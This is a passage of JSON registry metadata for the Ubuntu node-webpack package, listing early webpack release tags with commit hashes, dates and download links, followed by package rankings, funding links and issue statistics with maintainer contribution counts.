ebpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-22T19:35:50.607Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/node-webpack?arch=source\u0026distro=ubuntu-24.10\u0026repository_url=https://launchpad.net/ubuntu/oracular","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T17:39:29.481Z","issues_count":10162,"pull_requests_count":9399,"avg_time_to_close_issue":10837189.563112684,"avg_time_to_close_pull_request":2756725.7170131044,"issues_closed_count":9895,"pull_requests_closed_count":8852,"pull_request_authors_count":1443,"issue_authors_count":6683,"avg_comments_per_issue":5.834776618775831,"avg_comments_per_pull_request":3.1609745717629534,"merged_pull_requests_count":5992,"bot_issues_count":8,"bot_pull_requests_count":2909,"past_year_issues_count":80,"past_year_pull_requests_count":908,"past_year_avg_time_to_close_issue":899649.5272727272,"past_year_avg_time_to_close_pull_request":370883.2323943662,"past_year_issues_closed_count":55,"past_year_pull_requests_closed_count":710,"past_year_pull_request_authors_count":80,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4125,"past_year_avg_comments_per_pull_request":4.709251101321586,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":138,"past_year_merged_pull_requests_count":559,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1057,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"hai-x","count":123,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"avivkeller","count":30,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosy